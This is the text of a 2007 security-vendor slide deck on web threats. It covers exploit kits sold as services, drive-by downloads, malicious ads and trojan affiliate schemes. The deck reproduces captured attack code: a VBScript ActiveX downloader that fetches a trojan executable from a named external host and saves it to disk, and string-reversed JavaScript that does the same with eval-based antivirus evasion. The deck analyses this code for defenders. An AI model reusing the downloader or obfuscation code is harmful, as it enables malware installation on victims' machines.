Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc

Latest Threats and Attacks in Web Security

Iftach Ian Amit

Director, Security Research

Finjan inc.

Finjan Latest Threats – Greek ICT Forum 20072

The Business Behind New Exploits


IE Vulnerability For Sale


Buying Vulnerabilities

4


Exploits Selling Service

5


Exploits Selling Service

6


Web Attacker Toolkit - Website


Web Attacker Toolkit – AV Will Not Detect It


Web Attacker Toolkit – Order Page


Web Attacker Toolkit – Statistics Report


Neo Sploit

Updating the ‘customer’ when new versions are available

The recent ‘Release note’ log

Important update! Please update our product to v1.0.6 RC! 24 April 2007- fixed crypt algorithm

16 April 2007- new exploit module added- removed ANI exploit- fixed crypt algorithm

11 April 2007- new exploit module added- fixed crypt algorithm

31 March 2007- new exploit module added

22 March 2007- new exploit module added

11


MPack Toolkit – Statistics Report

12


Multi Exploit Pack

13


Where are the Malicious Servers?

Geo footprint of a single MPack toolkit operator

14


Drive-by, While Visiting Websites

Innocent Free Games site



Innocent Free Games site

Exploits our desktop to install a Trojan



Dynamic Code Obfuscation

Each user session includes a different exploit content



Free Whois service ….



1. Exploits the Internet Explorer VML vulnerability

2. Downloads a spyware

3. Downloads a malicious JPG file – Trojan.JS.Psyme.ct

4. Checks the type of Anti-Virus installed

5. Injects a virus that the installed Anti-Virus does not detect


AJAX-Based Exploits in the Wild, Hosted in the US

20

http ://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)

http://7dias.t35.com/index2.php


AJAX-Based Exploits in the Wild, Hosted in the US

dl = "http://gigafoto.front.ru/pr.exe"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")

str1= "Ado“+ "db.“+ "Str“+ “eam“

str5=str1

set S = df.createobject(str5,"")

str6="GET"

x.Open str6, dl, False

x.Send

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2) ' Get tmp folder

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

21

AJAX request goes undetected

The Trojan to be downloaded

Escape from Anti-Virus signatures

Save Trojan on the victim’s disk

http://gigafoto.front.ru/pr.exe


Distributing Malicious Code Using Ads

22


The Malicious Ad

23


Trojan-Based Affiliation Program

24



25


Trojan-Based Affiliation Program – in Action

26



27


How it looks like in the field?

28


Keeping all this activity under control:Evasive attacks!

29


Trojan’s Log

30


Trojan’s Log for Sale


Reactive Security Technologies…

SignaturesSignatures HeuristicsHeuristics URL CATURL CAT

They detect known attacks quickly…

BUT THEY

Do not stop the next attack

Do not stop a targeted attack

Require frequent updates

Require huge signature / URL databases

The next wave of attack

A targeted attack

The next wave of attack

A targeted attack


RSS Feed – Malicious Code, Reversed

http://www.tv-personalonline.com/rss2/rss.php

var fname = "C:\\mssync20.exe";var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");RE("");

var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");RE(";)'r_','di'(etubirttAtes.r_"); RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");

var is_ok= 0;try{

var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");is_ok= 1;

}catch(e){}

if (is_ok!= 1){

try{

var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");is_ok= 1;

}catch(e){}

}

33


function RE(s) { return eval(RV(s)); }

function RV(s){

var rev = "";for (i = 0; i < s.length; i++){

rev = s.charAt(i) + rev; }return rev;

}

RSS Feed – Malicious Code Reversed

Reversed functions

34


RSS Feed – Malicious Code Reversed

Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)

35


Recent Example


Finjan‘s Technology Real-Time Content Inspection (Patented)

Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)


Audit Results at Customer Networks

Thank you

Documents

Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc